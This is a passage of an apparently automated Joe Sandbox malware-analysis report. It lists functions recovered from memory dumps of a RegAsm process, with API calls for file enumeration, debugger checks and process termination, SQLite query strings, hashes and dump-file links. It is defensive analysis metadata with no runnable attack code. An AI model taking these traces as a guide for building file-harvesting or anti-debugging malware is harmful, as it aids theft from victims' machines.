wsprintfA.USER32 ref: 0041740E
FindFirstFileA.KERNEL32(?,?), ref: 00417425
StrCmpCA.SHLWAPI(?,004286EC), ref: 0041746C
StrCmpCA.SHLWAPI(?,004286F0), ref: 00417482
wsprintfA.USER32 ref: 004174A0
FindNextFileA.KERNEL32(00000000,?), ref: 004174F8
FindClose.KERNEL32(00000000), ref: 00417507
lstrcat.KERNEL32(?,0156F900), ref: 0041752B
lstrcat.KERNEL32(?,01571858), ref: 0041753F
lstrlen.KERNEL32(000000FF), ref: 00417549
lstrlen.KERNEL32(000000FF), ref: 00417557

Strings

%s\%s, xrefs: 0041749A
%s\*, xrefs: 00417408
pwA, xrefs: 00417579, 004174C2, 004174CA, 00417581

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlenwsprintf$AllocCloseFirstNextProcess
String ID: %s\%s$%s\*$pwA
API String ID: 1803110163-364130743
Opcode ID: ec8b764950fe3f4a6882b3d6d1ee6a5d0524fb5477c33bff5aede5d69c25d398
Instruction ID: ee0857e10955c6073d5021abd361dbdc8db23b38c03d5012e4d9e3a533002cd5
Opcode Fuzzy Hash: ec8b764950fe3f4a6882b3d6d1ee6a5d0524fb5477c33bff5aede5d69c25d398
Instruction Fuzzy Hash: 3151D475900219ABCB10EFA0CC49FEE77B9BF09704F50459EF605A3191DB789B88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1C37D9E0 Relevance: 23.3, APIs: 8, Strings: 5, Instructions: 564COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C37DACC, 1C37DE2F
misuse, xrefs: 1C37DAD6, 1C37DE39
%s at line %d of [%.10s], xrefs: 1C37DADB, 1C37DE3E
API called with NULL prepared statement, xrefs: 1C37DA9B, 1C37DDFE
API called with finalized prepared statement, xrefs: 1C37DAB0, 1C37DE13

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 7b01229b88957f62fdf0234efa9c3f0263ba1923ecbbccc223b475721e9b515e
Instruction ID: d86f545b59d5485ba9d0df5820a067e2e9efb034a73ac0676a22b629fdda1679
Opcode Fuzzy Hash: 7b01229b88957f62fdf0234efa9c3f0263ba1923ecbbccc223b475721e9b515e
Instruction Fuzzy Hash: 4C12F2B69047419BE7208F25CC48B9777E8AF45318F04072CE99A97242E77AE509CFB7

Uniqueness

Uniqueness Score: -1.00%

Function 1C27B400 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 367COMMON

Download Yara Rule

Strings

SELECT %s ORDER BY rowid %s, xrefs: 1C27B665
SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s, xrefs: 1C27B696
ASC, xrefs: 1C27B651, 1C27B678
DESC, xrefs: 1C27B656, 1C27B65E, 1C27B67D, 1C27B685

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: ASC$DESC$SELECT %s ORDER BY rowid %s$SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s
API String ID: 0-3496276579
Opcode ID: ceb3bc83875af42a5876e554dabd7a25da0dc3c7d75e78d9fb66c2782ebe668b
Instruction ID: 8f42f64f41ecb18af39064a7f3a367450ecc8cd41caee33b4a1430abecf382bd
Opcode Fuzzy Hash: ceb3bc83875af42a5876e554dabd7a25da0dc3c7d75e78d9fb66c2782ebe668b
Instruction Fuzzy Hash: 4FC146765047429BD711CF25D8807A7B7E0FF94310F240A2EFA858AA40E73AF559CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 1C2CDB10 Relevance: 18.3, APIs: 12, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80bf1530666ca63b8497ffa812fc90fde2bf582444a0055ec63c373b73d02ccc
Instruction ID: 34906e2616f62f3687a8dc151a03fc552840d34153e46b5087a886f2f97ee86e
Opcode Fuzzy Hash: 80bf1530666ca63b8497ffa812fc90fde2bf582444a0055ec63c373b73d02ccc
Instruction Fuzzy Hash: 4C81D576704301ABE710DF68CC80BABB3E9EF85304F540A2CF985D7251E675E9058BAB

Uniqueness

Uniqueness Score: -1.00%

Function 1C2CDFC0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

%lld %lld, xrefs: 1C2CE055

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %lld %lld
API String ID: 0-3794783949
Opcode ID: 8692e43e820e0f78f50641fdc10a9fdae0f10cd2214074cb03ddba5ab000dcb0
Instruction ID: 0c564208da39493467be0c5881a9777e371d1f633d0d726e17d2d9c71a09c6ce
Opcode Fuzzy Hash: 8692e43e820e0f78f50641fdc10a9fdae0f10cd2214074cb03ddba5ab000dcb0
Instruction Fuzzy Hash: 6B31F5B63002017BE7119A588C45FEB76AADF84710F204518F681A2251EA72E8158BBB

Uniqueness

Uniqueness Score: -1.00%

Function 1C3714D0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 360COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C3715A2
misuse, xrefs: 1C3715AC
%s at line %d of [%.10s], xrefs: 1C3715B1
API called with NULL prepared statement, xrefs: 1C371571
API called with finalized prepared statement, xrefs: 1C371586

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 841917b8a586be7c6abfcd98ea923a6d07a9d7a2547aa543919a25e4386dc0e4
Instruction ID: bf5c4d59111e180040a290c745208881fd695f6808da5958a791f54275f8c225
Opcode Fuzzy Hash: 841917b8a586be7c6abfcd98ea923a6d07a9d7a2547aa543919a25e4386dc0e4
Instruction Fuzzy Hash: B1C1E4B6A007419BE7208FA5CC45B9777EAAF44314F14072CE88E96241E77DE449CFB6

Uniqueness

Uniqueness Score: -1.00%

Function 1C37D4F0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 310COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C37D5DD
misuse, xrefs: 1C37D5E7
%s at line %d of [%.10s], xrefs: 1C37D5EC
API called with NULL prepared statement, xrefs: 1C37D5AC
API called with finalized prepared statement, xrefs: 1C37D5C1

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 1a5a508c30536859ddaa37d6359658bb3215f6fefeb2b596b686fe1bd8ed0ff8
Instruction ID: ed08acc4494d75c64d7a092d6656ed8fc9b53a000330b909a08f236329d6a182
Opcode Fuzzy Hash: 1a5a508c30536859ddaa37d6359658bb3215f6fefeb2b596b686fe1bd8ed0ff8
Instruction Fuzzy Hash: FDB1C1B69047419FE3108F25D888B97B7E4BF44318F04462CE8999B241E77AE449CFB7

Uniqueness

Uniqueness Score: -1.00%

Function 0040A660 Relevance: 13.8, APIs: 9, Instructions: 336fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

FindFirstFileA.KERNEL32(00000000,00427AC2,00000000,?,00427CC4,?,?,00427AC2,?,00000004), ref: 0040A6F1
StrCmpCA.SHLWAPI(?,00427CC8), ref: 0040A73C
StrCmpCA.SHLWAPI(?,00427CCC), ref: 0040A756
StrCmpCA.SHLWAPI(?,01571E80,00000000,?,?,?,00427CD0,?,?,00427AC3), ref: 0040A7EB

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID:
API String ID: 2567437900-0
Opcode ID: 417fddb4da55d50a135db98e9e85244356d3d6bf30ef5c3c0009510e01a1b6fd
Instruction ID: 2ea2fa0ab5ea545b4f28549334ef020faf7293f43af17f0994d5e3a1f08ac2fb
Opcode Fuzzy Hash: 417fddb4da55d50a135db98e9e85244356d3d6bf30ef5c3c0009510e01a1b6fd
Instruction Fuzzy Hash: 74D17170901248EACB10EBA5C9567DDBBB56F19304F50817EF945A32C2EB785B0CCBE6

Uniqueness

Uniqueness Score: -1.00%

Function 0040AAE0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 476fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00427AC6,?,?,00000011), ref: 0040AB53
StrCmpCA.SHLWAPI(?,00427CDC), ref: 0040ABDC
StrCmpCA.SHLWAPI(?,00427CE0), ref: 0040ABF6

Strings

\*.*, xrefs: 0040AB15
$, xrefs: 0040B17F

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindFirstlstrcatlstrlen
String ID: $$\*.*
API String ID: 1618123633-2097405073
Opcode ID: ebdad16dac6d82bfc07cb25e838ba81fa50f8e631c956cc7f6b3648dca9c7f13
Instruction ID: 9d0a2c0e34ca1c445267cdbe06f0ab8ac968f316d4e9e0d5098bc12580de8a59
Opcode Fuzzy Hash: ebdad16dac6d82bfc07cb25e838ba81fa50f8e631c956cc7f6b3648dca9c7f13
Instruction Fuzzy Hash: 9E123E71805149EACB15EBA1C951BEEBB78AF29304F1041BEF50673182DF786B4CCA69

Uniqueness

Uniqueness Score: -1.00%

Function 1C305940 Relevance: 12.4, APIs: 8, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf0dfd397ebe75573731b93a7c1f56ab9dad02391b55282b939a73c0ccd26d87
Instruction ID: 603df7b94acbe6941a1eceae054184bb2faaf46caca67aeecb201847cf93f745
Opcode Fuzzy Hash: bf0dfd397ebe75573731b93a7c1f56ab9dad02391b55282b939a73c0ccd26d87
Instruction Fuzzy Hash: 45C15977E192414FF701EA18CC827DB7791EB92310F98072EE485872D2E125A569CFB6

Uniqueness

Uniqueness Score: -1.00%

Function 1C287810 Relevance: 10.9, APIs: 7, Instructions: 422COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3309f5054bf077491345a5e491854f3645df5024784b6519573d938aeb967b2
Instruction ID: a681ab0db42343a926bd52d50469acf579019938507a40fa7c58f763599e6ab0
Opcode Fuzzy Hash: c3309f5054bf077491345a5e491854f3645df5024784b6519573d938aeb967b2
Instruction Fuzzy Hash: B8E114719043529FD301DF25C881A6BB7F4BF85A40F144A5DF885AB291E734E864CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 1C32D610 Relevance: 10.6, APIs: 7, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
Instruction ID: 22070b21de2a9984e70ec2bf367f6262d75a166dd48981e1e7e1ed226886016f
Opcode Fuzzy Hash: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
Instruction Fuzzy Hash: 01418B75600702ABDB10DF29CC84A9BB7E8FF45215F804A28F95896250E772E919CFB6

Uniqueness

Uniqueness Score: -1.00%

Function 0041BF87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041ED3A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041ED4F
UnhandledExceptionFilter.KERNEL32(8*d), ref: 0041ED5A
GetCurrentProcess.KERNEL32(C0000409), ref: 0041ED76
TerminateProcess.KERNEL32(00000000), ref: 0041ED7D

Strings

8*d, xrefs: 0041ED55

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: 8*d
API String ID: 2579439406-4035773523
Opcode ID: 5ed00ec2be3fa8c0a18033fda77e17b8655e54708fff43b7fca3586c98a20a9d
Instruction ID: ba808b284e536fa33b035d48e41bedda3b5bfac0dfc64b2c7f60dbe603414694
Opcode Fuzzy Hash: 5ed00ec2be3fa8c0a18033fda77e17b8655e54708fff43b7fca3586c98a20a9d
Instruction Fuzzy Hash: 4521C0BC9003069FC721DF65ECA96847BB2FB0A318FA0242AF90887670E77455C18F59

Uniqueness

Uniqueness Score: -1.00%

Function 1C265C70 Relevance: 9.1, APIs: 6, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
